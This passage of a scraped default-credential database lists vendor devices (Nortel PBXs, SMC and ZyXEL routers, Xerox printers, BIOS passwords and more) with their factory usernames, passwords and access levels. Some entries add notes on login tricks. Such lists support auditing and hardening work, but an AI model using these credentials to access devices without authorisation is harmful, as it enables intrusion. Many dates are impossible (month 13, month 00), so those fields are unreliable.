2002-1-10 2005-13-7 Network Associates WebShield Security Appliance e500 HTTP e500 e500changeme Admin No 2002-17-11 2005-13-7 Network Associates WebShield Security Appliance e250 HTTP e250 e250changeme Admin No 2002-17-11 2005-13-7 Network Everywhere NWR11B HTTP (none) admin Admin 2006-00-18 2006-00-18 Niksun NetDetector Multi vcr NetVCR Admin su after login with empty password No 2003-30-9 2005-13-7 Nimble PC BIOS Console n/a xdfk9874t3 Admin No 2002-1-10 2005-13-7 Nimble BIOS Console n/a xdfk9874t3 Admin No 2003-1-1 2005-13-7 Nokia DSL Router M1122 1.1 - 1.2 Multi m1122 m1122 User No 2003-1-1 2005-13-7 Nokia MW1122 Multi telecom telecom Admin Only in New Zealand. No 2003-22-1 2005-13-7 Nortel Meridian Link Multi disttech 4tas engineer account No 2002-1-10 2005-13-7 Nortel Meridian Link Multi maint maint Maintenance account No 2002-1-10 2005-13-7 Nortel Meridian Link Multi mlusr mlusr user account No 2002-1-10 2005-13-7 Nortel Remote Office 9150 Client admin root Admin No 2002-1-10 2005-13-7 Nortel Accelar (Passport) 1000 series routing switches Multi l2 l2 Layer 2 Read Write No 2002-1-10 2005-13-7 Nortel Accelar (Passport) 1000 series routing switches Multi l3 l3 Layer 3 (and layer 2) Read Write No 2002-1-10 2005-13-7 Nortel Accelar (Passport) 1000 series routing switches Multi ro ro Read Only No 2002-1-10 2005-13-7 Nortel Accelar (Passport) 1000 series routing switches Multi rw rw Read Write No 2002-1-10 2005-13-7 Nortel Accelar (Passport) 1000 series routing switches Multi rwa rwa Read Write All No 2002-1-10 2005-13-7 Nortel Extranet Switches Multi admin setup Admin No 2002-1-10 2005-13-7 Nortel Baystack 350-24T Telnet n/a secure Admin No 2002-1-10 2005-13-7 Nortel Meridian PBX Serial login 0 AUTH codes in LD 8 No 2002-1-10 2005-13-7 Nortel Meridian PBX Serial login 1111 AUTH codes in LD 8 No 2002-1-10 2005-13-7 Nortel Meridian PBX Serial login 8429 AUTH codes in LD 8 No 2002-1-10 2005-13-7 Nortel Meridian PBX Serial spcl 0 AUTH codes in LD 8 No 2002-1-10 2005-13-7 Nortel Meridian MAX Multi service smile general engineer account No 2002-1-10 2005-13-7 Nortel Meridian MAX Multi root 3ep5w2u Admin No 2002-1-10 2005-13-7 Nortel Matra 6501 PBX Console (none) 0 Admin No 2002-1-10 2005-13-7 Nortel Meridian MAX Multi maint ntacdmax Maintenance account No 2002-1-10 2005-13-7 Nortel Meridian CCR Multi service smile general engineer account No 2002-1-10 2005-13-7 Nortel Meridian CCR Multi disttech 4tas engineer account enter 3letter of day from yesterday an tomorrow (for Tuesday enter MonWed case sensitive) - may be twice to see root password in clear No 2002-1-10 2005-13-7 Nortel Meridian CCR Multi maint maint Maintenance account No 2002-1-10 2005-13-7 Nortel Meridian CCR Multi ccrusr ccrusr User account No 2002-1-10 2005-13-7 Nortel Meridian Multi n/a (none) Admin No 2002-1-10 2005-13-7 Nortel Meridian Link Multi service smile general engineer account No 2002-1-10 2005-13-7 Nortel Contivity Extranet/VPN switches HTTP admin setup Admin No 2003-23-4 2005-13-7 Nortel Business Communications Manager 3.5 and 3.6 HTTPS supervisor PlsChgMe Admin there is an exclamation point at the end of the password No 2004-9-7 2005-13-7 Nortel Phone System All From Phone n/a 266344 Installers No 2004-14-7 2005-13-7 Nortel Norstar Console 266344 266344 Admin No 2003-1-1 2005-13-7 Nullsoft Shoutcast 1.9.5 PLS admin changeme Admin 2006-00-05 2006-00-05 OKI C5700 HTTP root the 6 last digit of the MAC adress Admin running with other models 2006-06-28 2006-06-28 OMRON MR104FH Multi n/a (none) Admin No 2003-18-7 2005-13-7 Omnitronix Data-Link DL150 Multi (none) SUPER Admin No 2004-20-11 2005-13-7 Omnitronix Data-Link DL150 Multi (none) SMDR Admin No 2004-20-11 2005-13-7 OpenConnect OC://WebConnect Pro Multi admin OCS Admin No 2003-1-1 2005-13-7 OpenConnect OC://WebConnect Pro Multi adminstat OCS Admin No 2003-1-1 2005-13-7 OpenConnect OC://WebConnect Pro Multi adminview OCS Admin No 2003-1-1 2005-13-7 OpenConnect OC://WebConnect Pro Multi adminuser OCS Admin No 2003-1-1 2005-13-7 OpenConnect OC://WebConnect Pro Multi adminview OCS Admin No 2003-1-1 2005-13-7 OpenConnect OC://WebConnect Pro Multi helpdesk OCS Admin No 2003-1-1 2005-13-7 Openwave WAP Gateway Any HTTP sys uplink Admin No 2003-1-1 2005-13-7 Openwave MSP Any HTTP cac_admin cacadmin Admin No 2003-1-1 2005-13-7 Oracle Oracle RDBMS Any Multi system/manager sys/change_on_install Admin 2005-08-20 2005-08-20 Osicom NETPrint 500 1000 1500 and 2000 Series Telnet Manager Manager Admin No 2003-1-1 2005-13-7 Osicom NETPrint and JETX Print 500 1000 1500 and 2000 Series Telnet sysadm sysadm Admin No 2003-1-1 2005-13-7 Osicom Osicom Plus T1/PLUS 56k Telnet write private No 2002-1-10 2005-13-7 Osicom NETCommuter Remote Access Server Telnet debug d.e.b.u.g User No 2002-1-10 2005-13-7 Osicom NETCommuter Remote Access Server Telnet echo echo User No 2002-1-10 2005-13-7 Osicom NETCommuter Remote Access Server Telnet guest guest User No 2002-1-10 2005-13-7 Osicom NETCommuter Remote Access Server Telnet Manager Manager Admin No 2002-1-10 2005-13-7 Osicom NETCommuter Remote Access Server Telnet sysadm sysadm Admin No 2002-1-10 2005-13-7 Osicom Osicom Plus T1/PLUS 56k write private No 2003-1-1 2005-13-7 Osicom NETCommuter Remote Access Server Telnet sysadm sysadm Admin No 2003-2-1 2005-13-7 Osicom JETXPrint 1000E/B Telnet sysadm sysadm Admin No 2003-3-1 2005-13-7 Osicom JETXPrint 1000E/N Telnet sysadm sysadm Admin No 2003-4-1 2005-13-7 Osicom JETXPrint 1000T/N Telnet sysadm sysadm Admin No 2003-5-1 2005-13-7 Osicom JETXPrint 500 E/B Telnet sysadm sysadm Admin No 2003-6-1 2005-13-7 Osicom NETPrint "500 1000 1500 and 2000 Series" Telnet Manager Manager Admin 657 Osicom NETPrint "500 1000 1500 and 2000 Series" Telnet guest guest User 658 Osicom NETPrint "500 1000 1500 and 2000 Series" Telnet echo echo User 659 Osicom NETPrint "500 1000 1500 and 2000 Series" Telnet debug d.e.b.u.g User 660 OVISLINK WL8000AP WIRELESS G HTTP 12345 12345 Admin IP: 192.168.1.252 No 2005-6-3 2005-13-7 Pacific Micro Data MAST 9500 Universal Disk Array ESM ver. 2.11 / 1 Console pmd (none) Admin No 2002-1-10 2005-13-7 Panasonic CF-28 Multi n/a (none) Admin No 2004-25-5 2005-13-7 Panasonic CF-45 Multi n/a (none) Admin No 2004-8-7 2005-13-7 Panasonic PBX TDA 100/200/400 all Console (none) 1234 Admin google.com search q panasonic pbx tda 100 default password 2006-08-26 2006-08-26 Pansonic KXTD1232 Multi admin 1234 Admin 2005-08-27 2005-08-27 PentaSafe VigilEnt Security Manager 3 VigilEnt Security Manager Console PSEAdmin $secure$ Admin No 2002-1-10 2005-13-7 Pentagram Cerberus ADSL modem + router HTTP admin password Admin 2006-02-21 2006-02-21 Pentaoffice Sat Router Telnet (none) pento Admin 2006-02-01 2006-02-01 Perle CS9000 any Console admin superuser Admin No 2004-24-1 2005-13-7 Phoenix v1.14 Phoenix v1.14 Multi Administrator admin Admin 2005-10-25 2005-10-25 Pirelli Pirelli Router Multi admin mu Admin No 2003-3-10 2005-13-7 Pirelli Pirelli Router Multi admin microbusiness Admin No 2003-3-10 2005-13-7 Pirelli Pirelli Router Multi user password Admin No 2003-3-10 2005-13-7 Pirelli Pirelli AGE-SB HTTP admin smallbusiness Admin 2005-10-07 2005-10-07 Pirelli AGE ADSL Router Multi admin microbusiness Admin 2006-02-01 2006-02-01 Pirelli AGE ADSL Router Multi user password User 2006-02-01 2006-02-01 Planet WAP-1900/1950/2000 2.5.0 Multi (none) default Admin No 2002-1-10 2005-13-7 Planet ADE-4110 HTTP admin epicrouter Admin 2006-03-18 2006-03-18 Planet XRT-401D HTTP admin 1234 Admin 2006-03-18 2006-03-18 Planet ADE-4000 Multi admin epicrouter Admin 2006-03-18 2006-03-18 Polycom Soundpoint VoIP phones HTTP Polycom SpIp User No 2004-8-10 2005-13-7 Polycom ViewStation 4000 3.5 Multi (none) admin Admin No 2004-8-10 2005-13-7 Polycom iPower 9000 Multi (none) (none) Admin No 2004-8-10 2005-13-7 Prestigio Nobile 156 Multi n/a (none) Admin No 2005-01-17 2005-13-7 Proxim Orinoco 600/2000 All HTTP (none) (none) Admin WLAN accesspoint 2006-01-07 2006-01-07 Psion Teklogix 9150 HTTP support h179350 Admin No 2005-3-4 2005-13-7 Psionteklogix 9160 1.0 HTTP admin admin Admin 2006-08-05 2006-08-05 Psionteklogix 9160 1.0 HTTP admin admin Admin 2006-08-06 2006-08-06 Pyramid Computer BenHur all HTTP admin admin Admin No 2002-1-10 2005-13-7 Quintum Technologies Inc. Tenor Series all Multi admin admin Admin 2006-04-19 2006-04-19 RM RM Connect Multi setup changeme No 2002-1-10 2005-13-7 RM RM Connect Multi teacher password No 2002-1-10 2005-13-7 RM RM Connect Multi temp1 password No 2002-1-10 2005-13-7 RM RM Connect Multi admin rmnetlm No 2002-1-10 2005-13-7 RM RM Connect Multi admin2 changeme No 2002-1-10 2005-13-7 RM RM Connect Multi adminstrator changeme No 2002-1-10 2005-13-7 RM RM Connect Multi deskalt password No 2002-1-10 2005-13-7 RM RM Connect Multi deskman changeme No 2002-1-10 2005-13-7 RM RM Connect Multi desknorm password No 2002-1-10 2005-13-7 RM RM Connect Multi deskres password No 2002-1-10 2005-13-7 RM RM Connect Multi guest (none) No 2002-1-10 2005-13-7 RM RM Connect Multi replicator replicator No 2002-1-10 2005-13-7 RM RM Connect Multi RMUser1 password No 2002-1-10 2005-13-7 RM RM Connect Multi topicalt password No 2002-1-10 2005-13-7 RM RM Connect Multi topicnorm password No 2002-1-10 2005-13-7 RM RM Connect Multi topicres password No 2002-1-10 2005-13-7 Radware Linkproof ssh lp lp Admin No 2003-22-8 2005-13-7 Radware Linkproof 3.73.03 Multi radware radware Admin No 2004-9-7 2005-13-7 Raidzone raid arrays n/a raidzone No 2002-1-10 2005-13-7 Ramp Networks WebRamp wradmin trancell No 2002-1-10 2005-13-7 Ramp Networks WebRamp wradmin trancell No 2003-1-1 2005-13-7 RedHat Redhat 6.2 HTTP piranha q User No 2002-1-10 2005-13-7 RedHat Redhat 6.2 HTTP piranha piranha User No 2002-1-10 2005-13-7 Research PC BIOS Console n/a Col2ogro2 Admin No 2002-1-10 2005-13-7 Research BIOS Console n/a Col2ogro2 Admin No 2003-1-1 2005-13-7 Ricoh Aficio AP3800C HTTP sysadmin password Admin No 2003-3-6 2005-13-7 Ricoh Aficio 2228c Multi sysadmin password Admin Webpage admin 2005-07-30 2005-07-30 Ricoh Aficio AP3800C 2.17 HTTP (none) password Admin alternative to sysadmin and Admin 2006-04-05 2006-04-05 Ricoh Aficio 2232C Telnet n/a password Admin 2006-04-05 2006-04-05 Ricoh AP410N 1.13 HTTP admin (none) Admin 2006-05-21 2006-05-21 Ricoh Aficio 2020D HTTP admin password Admin 2006-06-31 2006-06-31 RoamAbout RoamAbout R2 Wireless Access Platform Multi admin password Admin No 2003-14-9 2005-13-7 SAGEM FAST 1400 Multi admin epicrouter Admin 2006-03-18 2006-03-18 SIEMENS SE515 HTTP admin n/a Admin No 2004-9-7 2005-13-7 SMC Barricade 7004 AWBR Multi admin (none) Admin 192.168.123.254 (WiFi AP) No 2002-1-10 2005-13-7 SMC Router All HTTP admin admin Admin No 2002-1-10 2005-13-7 SMC SMC broadband router HTTP admin admin Admin No 2003-13-6 2005-13-7 SMC SMC2804WBR v.1 HTTP (none) smcadmin Admin No 2004-01-01 2005-13-7 SMC WiFi Router All HTTP n/a smcadmin Admin model #2804WBRP-G No 2004-18-5 2005-13-7 SMC SMB2804WBR V2 Multi Administrator smcadmin Admin No 2004-22-5 2005-13-7 SMC 7401BRA 1 HTTP admin barricade Admin No 2004-13-6 2005-13-7 SMC 7401BRA 2 HTTP smc smcadmin Admin No 2004-13-6 2005-13-7 SMC Barricade7204BRB HTTP admin smcadmin Admin No 2005-01-23 2005-13-7 SMC 2804wr HTTP (none) smcadmin Admin No 2005-24-2 2005-13-7 SMC Router/Modem BR7401 Multi admin barricade Admin 2006-00-04 2006-00-04 SMC SMCWBR14-G SMCWBR14-G HTTP (none) smcadmin Admin 2006-02-02 2006-02-02 SMC Modem/Router HTTP cusadmin highspeed Customer Admin Comcast Commercial High Speed Modem model number 8013WG 2006-03-05 2006-03-05 SMC 7204BRA Multi smc smcadmin Admin 2006-03-18 2006-03-18 SMC SMCWBR14-G HTTP n/a smcadmin Admin mentioned password (no passwd) on your webpage is wrong 2006-04-03 2006-04-03 SMC smc7904wbrb Multi (none) smcadmin Admin 2006-09-12 2006-09-12 SMC SMC7004VBR HTTP n/a smcadmin Admin 2006-08-21 2006-08-21 SOPHIA (Schweiz) AG Protector HTTPS admin Protector Admin No 2005-26-4 2005-13-7 SOPHIA (Schweiz) AG Protector SSH root root Admin No 2005-26-4 2005-13-7 SSA BPCS Up to 5.02 Multi SSA SSA Admin rarely changed/used for upgrades-patches 2006-08-11 2006-08-11 Sagem F@st 1200 (Fast 1200) Telnet root 1234 User root/1234 2006-06-30 2006-06-30 Samsung MagicLAN SWL-3500RG 2.15 HTTP public public Admin def. WEP keys: 0123456789 1518896203 No 2004-22-1 2005-13-7 Scientific Atlanta DPX2100 Comcast-supplied HTTP admin w2402 diagnostics page 192.168.100.1 2006-06-14 2006-06-14 Secure Computing Webwasher all HTTP admin (none) Admin 2006-08-12 2006-08-12 Senao 2611CB3+D (802.11b Wireless AP) HTTP admin (none) Admin Default IP: 192.168.1.1 No 2004-13-4 2005-13-7 Sercom IP806GA HTTP admin admin Admin 2006-09-24 2006-09-24 Sercom IP806GB HTTP admin admin Admin 2006-09-24 2006-09-24 Server Technology Sentry Remote Power Manager Multi GEN1 gen1 view/control Telnet port 2001 No 2002-1-10 2005-13-7 Server Technology Sentry Remote Power Manager Multi GEN2 gen2 view/control Telnet port 2001 No 2002-1-10 2005-13-7 Server Technology Sentry Remote Power Manager Multi ADMN admn Admin Telnet port 2001 No 2002-1-10 2005-13-7 Sharp AR-M355N HTTP admin Sharp Admin 2006-09-18 2006-09-18 Sharp MX-3501n HTTP Administrator admin Admin 2006-09-18 2006-09-18 Siemens ROLM PBX eng engineer No 2002-1-10 2005-13-7 Siemens ROLM PBX op op No 2002-1-10 2005-13-7 Siemens ROLM PBX op operator No 2002-1-10 2005-13-7 Siemens ROLM PBX su super No 2002-1-10 2005-13-7 Siemens PhoneMail poll tech No 2002-1-10 2005-13-7 Siemens PhoneMail sysadmin sysadmin No 2002-1-10 2005-13-7 Siemens ROLM PBX admin pwp No 2002-1-10 2005-13-7 Siemens PhoneMail tech tech No 2002-1-10 2005-13-7 Siemens 5940 T1E1 Router 5940-001 v6.0.180-2 Telnet superuser admin Admin No 2004-25-10 2005-13-7 Siemens PhoneMail poll tech No 2003-1-1 2005-13-7 Siemens PhoneMail sysadmin sysadmin No 2003-1-1 2005-13-7 Siemens PhoneMail tech tech No 2003-2-1 2005-13-7 Siemens ROLM PBX admin pwp No 2003-3-1 2005-13-7 Siemens ROLM PBX eng engineer No 2003-4-1 2005-13-7 Siemens ROLM PBX op op No 2003-5-1 2005-13-7 Siemens ROLM PBX op operator No 2003-6-1 2005-13-7 Siemens ROLM PBX su super No 2003-7-1 2005-13-7 Siemens SpeedStream 4100 HTTP admin hagpolm1 Admin DSL Modem and Router 2005-10-03 2005-10-03 Siemens SE560dsl Multi admin admin Admin Also has an account with: user/user 2006-07-30 2006-07-30 Siemens Nixdorf PC BIOS Console n/a SKY_FOX Admin No 2002-1-10 2005-13-7 Siemens Nixdorf BIOS Console n/a SKY_FOX Admin No 2003-1-1 2005-13-7 Siemens Pro C5 Siemens Multi n/a (none) Admin No 2004-18-1 2005-13-7 Sigma Sigmacoma IPshare Sigmacom router v1.0 HTTP admin admin Admin effes2004@gmail.com 2005-07-17 2005-07-17 Signamax 065-7726S Multi admin admin Admin Switch 2006-08-04 2006-08-04 Siips Trojan 8974202 Multi Administrator ganteng Admin Thx No 2002-1-10 2005-13-7 Silvercrest WR-6640Sg HTTP admin admin Admin 2006-10-19 2006-10-19 Sitecom All WiFi routers Multi (none) sitecom Admin No 2004-24-5 2005-13-7 SmartSwitch Router 250 ssr2500 v3.0.9 Multi admin (none) Admin No 2002-1-10 2005-13-7 Snapgear "Pro Lite and SOHO" 1.79 + Multi root default Admin Before 1.79 no user name req. N 752 SOHOWARE NBG800 HTTP admin 1234 Admin No 2004-02-31 2005-13-7 Solution 6 Viztopia Accounts Multi aaa often blank Admin No 2004-25-7 2005-13-7 Sonic-X SonicAnime on Telnet root admin Admin 101010100001010 2005-09-28 2005-09-28 SonicWALL ALL ALL HTTP admin password Admin No 2002-1-10 2005-13-7 Sorenson SR-200 HTTP (none) admin Admin 2005-11-16 2005-11-16 SpeedStream 5660 Telnet n/a adminttd Admin No 2004-28-1 2005-13-7 SpeedXess HASE-120 Multi (none) speedxess Admin No 2002-1-10 2005-13-7 Speedstream 5861 SMT Router Multi admin admin Admin No 2002-1-10 2005-13-7 Speedstream 5871 IDSL Router Multi admin admin Admin No 2002-1-10 2005-13-7 Speedstream Router 250 ssr250 Multi admin admin Admin No 2002-1-10 2005-13-7 Speedstream DSL Multi admin admin Admin No 2002-1-10 2005-13-7 Speedstream 5667 R4.0.1 HTTP (none) admin Admin No 2003-23-6 2005-13-7 Spike CPE Console enable (none) Admin No 2002-1-10 2005-13-7 Sun JavaWebServer 1.x 2.x AdminSrv admin admin Admin No 2002-1-10 2005-13-7 Sun Cobalt HTTP admin admin Admin submit by Nabil Ouchn 2005-09-03 2005-09-03 Sun Microsystems ILOM of X4100 1.0 HTTP root changeme Admin 2006-01-16 2006-01-16 Swissvoice IP 10S Telnet target password Admin 2005-10-13 2005-10-13 Sybase EAServer HTTP jagadmin (none) Admin Source : Manufactor documentation 2005-06-22 2005-06-22 Symbol Spectrum series 4100-4121 HTTP n/a Symbol Admin Access Point Wireless No 2003-25-8 2005-13-7 Symbol AP-2412 Multi n/a Symbol Admin 2Mbps FH AccessPoint 2005-10-30 2005-10-30 Symbol AP-3020 Multi n/a Symbol Admin 2Mbps FH AccessPoint 2005-10-30 2005-10-30 Symbol AP-4111 Multi n/a Symbol Admin 11Mbps DS AccessPoint 2005-10-30 2005-10-30 Symbol AP-4121 Multi n/a Symbol Admin 11Mbps DS AccessPoint 2005-10-30 2005-10-30 Symbol AP-4131 Multi n/a Symbol Admin 11Mbps DS AccessPoint 2005-10-30 2005-10-30 Symbol CB3000 A1 HTTPS admin symbol Admin Default IP 10.10.1.1 2006-08-22 2006-08-22 System/32 VOS Multi install secret Admin 2006-02-01 2006-02-01 T-Comfort Routers HTTP Administrator (none) Admin No 2004-21-11 2005-13-7 TANDBERG TANDBERG 8000 Multi (none) TANDBERG Admin http://www.tandberg.net/collateral/user_manuals/TANDBERG_8000_UserMan.pdf Yes 2004-10-4 2005-13-7 TVT System Expresse G5 Multi craft (none) Admin No 2002-1-10 2005-13-7 TVT System Expresse G5 DS1 Module Multi (none) enter Admin No 2002-1-10 2005-13-7 Tandberg 6000MXP Multi Admin (none) Admin 2006-10-01 2006-10-01 Tandberg Data DLT8000 Autoloader 10x Console n/a 0000010023 Maintenance 2005-10-15 2005-10-15 Tandem TACL Multi super.super (none) Admin 2006-02-01 2006-02-01 Tandem TACL Multi super.super master Admin 2006-02-01 2006-02-01 Team Xodus XeniumOS 2.3 FTP xbox xbox Admin No 2005-1-4 2005-13-7 Teklogix Accesspoint Multi Administrator (none) Admin No 2002-1-9 2005-13-7 Telco Systems Edge Link 100 Console telco telco telco 2006-04-02 2006-04-02 Teledat Routers HTTP admin 1234 Admin No 2004-21-11 2005-13-7 Teletronics WL-CPE-Router 3.05.2 HTTPS admin 1234 Admin No 2005-24-3 2005-13-7 Telewell TW-EA200 Multi admin password Admin No 2004-9-7 2005-13-7 Telindus 1124 HTTP n/a (none) Admin No 2004-17-8 2005-13-7 Telindus SHDSL1421 yes HTTP admin admin Admin No 2005-01-30 2005-13-7 Tellabs Titan 5500 FP 6.x Multi tellabs tellabs#1 Admin No 2002-1-10 2005-13-7 Tellabs 7120 Multi root admin_1 Admin telnet on port 3083 No 2005-3-1 2005-13-7 Terayon Unknown Comcast-supplied HTTP (none) (none) diagnostics page 192.168.100.1/diagnostics_page.html 2006-06-14 2006-06-14 Terayon Unknown Comcast-supplied HTTP (none) (none) diagnostics page 192.168.100.1/diagnostics_page.html 2006-06-14 2006-06-14 Tiara 1400 3.x Console tiara tiaranet Admin also known as Tasman Networks routers No 2003-14-7 2005-13-7 Topcom Wireless Webr@cer 1154+ PSTN (Annex A) V 4.00.0 HTTP admin admin Admin G+ mode (125Mbps) integration 2006-09-24 2006-09-24 Topcom Wireless Webr@cer 1154+ PSTN (Annex A) V 0.01.06 HTTP admin admin Admin WPA-PSK implemented 2006-09-24 2006-09-24 Topcom Wireless Webr@cer 1154+ PSTN (Annex A) V 0.01.09 HTTP admin admin Admin Improved wireless stability 2006-09-24 2006-09-24 Troy ExtendNet 100zx Multi admin extendnet Admin dizphunKt No 2003-18-5 2005-13-7 U.S. Robotics SureConnect 9003 ADSL Ethernet/USB Router Multi root 12345 Admin 2006-03-18 2006-03-18 U.S. Robotics SureConnect 9105 ADSL 4-Port Router HTTP admin admin Admin 2006-03-18 2006-03-18 UNEX Routers HTTP n/a password Admin No 2004-21-11 2005-13-7 US ROBOTICS ADSL Ethernet Modem HTTP (none) 12345 Admin No 2002-1-10 2005-13-7 US Robotics USR8000 1.23 / 1.25 Multi root admin Admin DSL-Router. Web-Login always uses user root No 2002-1-10 2005-13-7 US Robotics USR8550 3.0.5 Multi Any 12345 Any Best Modem No 2002-1-10 2005-13-7 US Robotics SureConnect ADSL SureConnect ADSL Telnet support support User works after 3rd login trial No 2005-9-3 2005-13-7 US Robotics USR9110 HTTP admin (none) Admin default IP subnet: 192.168.1.0 2006-08-04 2006-08-04 Unisys ClearPath MCP Multi NAU NAU Privileged Network Administration Utility No 2003-2-7 2005-13-7 Unisys ClearPath MCP Multi ADMINISTRATOR ADMINISTRATOR Admin No 2003-2-7 2005-13-7 Unisys ClearPath MCP Multi HTTP HTTP Web Server Administration No 2003-2-7 2005-13-7 VASCO VACMAN Middleware 2.x Multi admin (none) Admin strong authentication server No 2004-4-9 2005-13-7 Verifone Verifone Junior 2.05 (none) 166816 No 2002-1-10 2005-13-7 Verilink NE6100-4 NetEngine IAD 3.4.8 Telnet (none) (none) Guest No 2004-27-6 2005-13-7 Visual Networks Visual Uptime T1 CSU/DSU 1 Console admin visual Admin No 2005-13-4 2005-13-7 VxWorks misc Multi admin admin Admin 2006-02-01 2006-02-01 VxWorks misc Multi guest guest Guest 2006-02-01 2006-02-01 Wanadoo Livebox Multi admin admin Admin 2005-10-04 2005-10-04 Wang Wang Multi CSG SESAME Admin 2006-02-01 2006-02-01 Watch guard firebox 1000 Multi admin (none) Admin No 2002-1-10 2005-13-7 Watchguard SOHO and SOHO6 all versions FTP user pass Admin works only from the inside LAN No 2003-8-6 2005-13-7 Westell Versalink 327 Multi admin (none) Admin No 2005-1-3 2005-13-7 Westell Wirespeed Multi admin password Admin also try password: sysAdmin 2005-08-05 2005-08-05 Westell Wang Multi CSG SESAME Admin 2006-02-01 2006-02-01 Westell Wirespeed wireless router Multi admin sysAdmin Admin 2006-02-01 2006-02-01 Wyse Winterm 5440XL Console root wyse Admin No 2002-1-10 2005-13-7 Wyse Winterm 5440XL VNC VNC winterm VNC No 2002-1-10 2005-13-7 Wyse Winterm 9455XL BIOS (none) Fireport BIOS Case Sensitive No 2003-7-7 2005-13-7 Wyse winterm Multi root (none) Admin No 2003-19-10 2005-13-7 Wyse rapport 4.4 FTP rapport r@p8p0r+ ftp logon to controlling ftp server. No 2005-1-1 2005-13-7 Wyse Winterm 3150 VNC n/a password Admin by satadru 2006-04-05 2006-04-05 X-Micro X-Micro WLAN 11b Broadband Router 1.2.2 1.2.2.3 1.2.2.4 1.6.0.0 Multi super super Admin From BUGTRAQ No 2004-19-3 2005-13-7 X-Micro X-Micro WLAN 11b Broadband Router 1.6.0.1 HTTP 1502 1502 Admin From BUGTRAQ No 2004-19-3 2005-13-7 X-Micro WLAN 11b Access Point 1.2.2 Multi super super Admin http://secunia.com/advisories/11342/ No 2004-30-6 2005-13-7 Xavi 7000-ABA-ST1 Console n/a (none) Admin No 2004-6-8 2005-13-7 Xavi 7001 Console n/a (none) Admin No 2004-6-8 2005-13-7 Xerox Multi Function Equipment Multi admin 2222 Admin combo fax/scanner/printer with network access No 2002-1-10 2005-13-7 Xerox WorkCenter Pro 428 HTTP admin admin Admin No 2002-1-10 2005-13-7 Xerox Document Centre 425 HTTP admin (none) Admin No 2004-8-9 2005-13-7 Xerox DocuCentre 425 HTTP admin 22222 Admin works for access panel 2 2005-11-07 2005-11-07 Xerox Document Centre 405 - HTTP admin admin Admin 2006-01-02 2006-01-02 Xerox 240a HTTP admin x-admin Admin 2006-08-25 2006-08-25 Xylan Omniswitch Telnet admin switch Admin Yes 2002-1-10 2005-13-7 Xylan Omniswitch Telnet diag switch Admin Yes 2002-1-10 2005-13-7 Xylan omniswitch Multi admin switch Admin Yes 2002-1-10 2005-13-7 Xyplex Routers Port 7000 n/a system Admin No 2002-1-10 2005-13-7 Xyplex Terminal Server Port 7000 n/a access User No 2002-1-10 2005-13-7 Xyplex Terminal Server Port 7000 n/a system Admin No 2002-1-10 2005-13-7 Xyplex Routers Port 7000 n/a access User No 2002-1-10 2005-13-7 Xyplex Routers Port 7000 n/a access User No 2002-1-10 2005-13-7 Xyplex Terminal Server Port 7000 n/a access User No 2002-1-10 2005-13-7 Xyplex Terminal Server Port 7000 n/a system Admin No 2002-1-10 2005-13-7 Yakumo Routers HTTP admin admin Admin No 2004-21-11 2005-13-7 ZOOM ZOOM ADSL Modem Console admin zoomadsl Admin No 2004-28-9 2005-13-7 Zcom Wireless SNMP root admin Admin No 2002-1-10 2005-13-7 Zebra 10/100 Print Server Multi admin 1234 Admin 2005-11-28 2005-11-28 ZyXEL Prestige HTTP n/a 1234 Admin http://192.168.1.1 Yes 2002-1-10 2005-13-7 ZyXEL Prestige FTP root 1234 Admin Yes 2002-1-10 2005-13-7 ZyXEL Prestige Telnet (none) 1234 Admin Yes 2002-1-10 2005-13-7 ZyXEL Prestige 643 Console (none) 1234 Admin Yes 2004-12-3 2005-13-7 ZyXEL Prestige 652HW-31 ADSL Router HTTP admin 1234 Admin http://192.168.1.1 Yes 2004-22-2 2005-13-7 ZyXEL Prestige 100IH Console n/a 1234 Admin Yes 2004-12-3 2005-13-7 ZyXEL Prestige 650 Multi 1234 1234 Admin No 2004-30-11 2005-13-7 ZyXEL Prestige 900 HTTP webadmin 1234 Admin 192.168.1.1:8080 2006-00-10 2006-00-10 ZyXEL Prestige 645 HTTP admin 1234 Admin 2006-03-25 2006-03-25 ZyXEL ZyWALL Series Prestige 660R-61C Multi n/a admin Admin 2006-04-03 2006-04-03 ZyXel Prestige P660HW Multi admin 1234 Admin 2006-07-20 2006-07-20 Zyxel ZyWall 2 HTTP n/a (none) Admin No 2004-14-5 2005-13-7 Zyxel adsl routers All ZyNOS Firmwares Multi admin 1234 Admin this is default for dsl routers provided by the ISP firstmile.no No 2004-28-10 2005-13-7 Zyxel Prestige 660HW Multi admin admin Admin 2006-06-19 2006-06-19 Zyxel Router 650-1 Telnet (none) 1234 Admin Telefonica 2006-08-27 2006-08-27 accton t-online accton Multi (none) 0 Admin No 2004-8-1 2005-13-7 accton t-online accton Multi (none) 0 Admin No 2004-8-1 2005-13-7 adtran MX2800 Telnet n/a adtran Admin hit enter a few times Yes 2002-1-10 2005-13-7 adtran Smart 16/16e Telnet n/a (none) Admin hit enter a few times Yes 2004-9-2 2005-13-7 adtran Atlas 800/800Plus/810Plus/550 Telnet n/a Password Admin crtl-L Yes 2004-9-2 2005-13-7 adtran Smart 16/16e Telnet n/a PASSWORD Admin hit enter a few times Yes 2004-9-2 2005-13-7 adtran NxIQ Telnet n/a adtran Admin hit enter a few times Yes 2004-9-2 2005-13-7 adtran TSU IQ/DSU IQ Telnet n/a (none) Admin hit enter a few times Yes 2004-9-2 2005-13-7 adtran Express 5110/5200/5210 Telnet n/a adtran Admin hit enter a few times Yes 2004-9-2 2005-13-7 adtran Agent Card Telnet n/a ADTRAN Admin ctrl-PTT Yes 2004-9-2 2005-13-7 adtran TSU Router Module/L128/L768/1.5 Telnet n/a (none) Admin hit enter a few times Yes 2004-9-2 2005-13-7 adtran T3SU 300 Telnet n/a adtran Admin Hit enter a few times Yes 2004-9-2 2005-13-7 apc Smartups 3000 HTTP apc apc Admin By Sentinel Software.net No 2004-11-7 2005-13-7 apple airport5 1.0.09 Multi root admin Admin 192.168.1.1 2006-00-03 2006-00-03 asmack router ar804u HTTP admin epicrouter Admin 2006-02-03 2006-02-03 asus WL500g HTTP admin admin Admin 2005-10-28 2005-10-28 axis 2100 Multi n/a (none) Admin No 2005-29-3 2005-13-7 aztech DSL-600E HTTP admin admin Admin 2006-04-12 2006-04-12 canyon router Multi Administrator admin Admin 2006-02-09 2006-02-09 cisco cva 122 Telnet admin admin Admin No 2002-1-10 2005-13-7 cisco 3600 Telnet Administrator admin Guest No 2003-28-10 2006-10-15 cisco GSR Telnet admin admin admin No 2004-14-11 2005-13-7 cisco 2600 Telnet Administrator admin Admin 2006-00-25 2006-00-25 comtrend ct536+ Multi admin (none) Admin 2006-04-14 2006-04-14 conexant ACCESS RUNNER ADSL CONSOLE PORT 3.27 